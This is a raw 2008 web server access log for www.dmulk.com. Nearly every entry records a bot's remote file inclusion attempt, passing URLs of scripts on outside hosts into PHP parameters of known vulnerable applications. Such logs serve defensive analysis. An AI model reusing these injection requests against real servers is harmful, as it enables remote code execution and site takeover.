89.208.43.121 - - [19/Aug/2008:10:48:30 -0700] "GET /logs/errors.php?error=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:48:40 -0700] "GET /logs//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 200 61289 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:48:41 -0700] "GET //?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 200 9869 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:49:02 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:49:02 -0700] "GET /logs//common/db.php?commonpath=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:49:02 -0700] "GET //common/db.php?commonpath=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:49:04 -0700] "GET /logs/access_080601.log//common/db.php?commonpath=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:10:49:17 -0700] "GET /logs/access_080812.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:49:22 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:49:23 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:49:23 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:10:49:48 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:10:49:48 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:49:50 -0700] "GET /logs/access_080621.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:49:55 -0700] "GET /logs/access_080127.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:49:55 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:49:55 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:10:50:04 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:10:50:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:50:25 -0700] "GET /logs/access_080510.log/index.php?place=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:50:25 -0700] "GET /logs/index.php?place=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:50:25 -0700] "GET /logs/access_080114.log//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:50:26 -0700] "GET /index.php?place=http://123fuck.t35.com/id.txt???? HTTP/1.1" 200 9869 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:50:30 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:50:30 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:50:33 -0700] "GET /logs/access_080418.log/index.php?place=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:50:33 -0700] "GET /logs/access_080516.log/index.php?ort=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:50:33 -0700] "GET /logs/index.php?ort=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:50:33 -0700] "GET /logs/access_080429.log/index.php?ort=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:50:34 -0700] "GET /index.php?ort=http://123fuck.t35.com/id.txt???? HTTP/1.1" 200 9867 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:10:50:56 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:10:50:56 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:10:50:57 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:10:51:00 -0700] "GET /logs/access_080725.log//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:10:51:00 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:51:03 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:51:03 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:10:51:03 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:51:03 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:51:03 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:51:04 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:51:04 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:51:05 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:10:51:09 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:10:51:09 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:10:51:09 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:10:51:10 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:51:33 -0700] "GET //mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:10:51:40 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.26.215.28 - - [19/Aug/2008:10:51:41 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:10:52:06 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:52:27 -0700] "GET /logs/access_080720.log//skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:52:27 -0700] "GET //skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:52:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:52:45 -0700] "GET /logs/access_080728.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:52:49 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:52:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:52:50 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:53:01 -0700] "GET /logs/access_080526.log%20/index.php?ort=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:53:06 -0700] "GET /logs/access_080718.log//common/db.php?commonpath=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.187.25.20 - - [19/Aug/2008:10:53:26 -0700] "GET /logs/access_080717.log//admin/frontpage_right.php?loadadminpage=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:53:29 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:53:30 -0700] "GET /logs/access_080601.log//common/db.php?commonpath=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:53:39 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:53:58 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:53:59 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:53:59 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:10:54:15 -0700] "GET /logs/access_071104.log HTTP/1.0" 200 75933 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:54:19 -0700] "GET /logs/access_080731.log/index.php?ort=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:10:54:19 -0700] "GET /logs/access_080804.log/index.php?ort=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:10:54:21 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:54:28 -0700] "GET /logs/access_080316.log/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:54:29 -0700] "GET /index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 200 9928 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:54:29 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:54:36 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:10:54:36 -0700] "GET /logs/access_080808.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clubmusic.caucasus.net/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:54:46 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:54:54 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:54:58 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:54:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:54:59 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:10:55:01 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:10:55:13 -0700] "GET /logs/access_080626.log/errors.php?error=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:55:15 -0700] "GET /logs/access_080808.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://clubmusic.caucasus.net/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:10:55:25 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:10:55:25 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:10:55:25 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:55:26 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:10:55:26 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 200 9897 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:10:55:32 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:10:55:32 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:10:55:32 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:55:36 -0700] "GET /errors.php?error=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:10:55:43 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:10:55:44 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:10:55:44 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:10:56:24 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:10:56:24 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:10:56:24 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:10:56:27 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 200 9897 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:56:42 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.81.18 - - [19/Aug/2008:10:56:45 -0700] "GET /logs/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.81.18 - - [19/Aug/2008:10:56:45 -0700] "GET /index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.81.18 - - [19/Aug/2008:10:56:45 -0700] "GET /logs/access_080622.log/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:56:46 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:56:46 -0700] "GET /errors.php?error=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.81.18 - - [19/Aug/2008:10:56:47 -0700] "GET /logs/access_080314.log/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:56:56 -0700] "GET /logs/index2.php?x=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:56:59 -0700] "GET /index2.php?x=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.22.202 - - [19/Aug/2008:10:57:00 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.22.202 - - [19/Aug/2008:10:57:00 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.22.202 - - [19/Aug/2008:10:57:01 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:10:57:10 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.172.129.75 - - [19/Aug/2008:10:57:18 -0700] "GET /logs/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.75 - - [19/Aug/2008:10:57:18 -0700] "GET /logs/access_080622.log/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.75 - - [19/Aug/2008:10:57:18 -0700] "GET /index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:10:57:21 -0700] "GET /logs/access_080718.log//common/db.php?commonpath=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.80.18.136 - - [19/Aug/2008:10:57:21 -0700] "GET /logs/access_080622.log/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.80.18.136 - - [19/Aug/2008:10:57:21 -0700] "GET /index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.80.18.136 - - [19/Aug/2008:10:57:21 -0700] "GET /logs/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.172.129.75 - - [19/Aug/2008:10:57:22 -0700] "GET /logs/access_080314.log/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.80.18.136 - - [19/Aug/2008:10:57:24 -0700] "GET /logs/access_080314.log/index.php3?perso=http://www.freexhost.info/users/gardhenal/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
